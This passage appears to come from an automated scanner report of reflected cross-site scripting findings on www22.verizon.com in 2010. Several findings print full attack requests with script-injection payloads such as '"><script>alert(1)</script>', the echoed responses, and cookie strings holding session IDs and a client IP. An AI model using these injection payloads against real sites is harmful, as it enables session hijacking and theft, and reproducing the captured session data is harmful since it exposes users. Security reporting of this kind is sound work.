This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64661
Expires: Sat, 20 Nov 2010 00:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<script language ="javascript">

// for check Availabiltity
var BannerID = "BannerDry1m55d47";6993170f2f3";
var xmlSource = "<PROMOBANNERS>
...[SNIP]...

1.10. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b710b"><script>alert(1)</script>55aa320ee52 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Sat, 20 Nov 2010 02:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:39:02 GMT
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52"/>
...[SNIP]...

1.11. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx

Issue detail

The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 89a05%0aalert(1)//cc561db1e96 was submitted in the FlowRoute parameter. This input was echoed as 89a05
alert(1)//cc561db1e96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx?FlowRoute=NB-NS89a05%0aalert(1)//cc561db1e96 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22604
Expires: Sat, 20 Nov 2010 02:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:26 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=TiFI0EpTTVOnzjDD4KXHGQ%3d%3d; domain=.verizon.com; path=/

<script language="javascript"> vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...

//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "NB-NS89a05
alert(1)//cc561db1e96";
FlowRoute = ("NB-NS89a05
alert(1)//cc561db1e96");

locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + Flo
...[SNIP]...

1.12. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/ForYourHome/MyAccount/Protected/Services/MyServices.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37328"%3b82d1bb06d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37328";82d1bb06d82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328"%3b82d1bb06d82=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 129022



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328";82d1bb06d82=1';

...[SNIP]...

1.13. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71f4e"%3b9ffd29efbfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71f4e";9ffd29efbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e"%3b9ffd29efbfb=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:46:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCQADSRDB=JFJJPGMCOIBMGHBLMKJGGKJD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660;path=/
Content-Length: 129039



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
trMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e";9ffd29efbfb=1';

...[SNIP]...

1.14. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
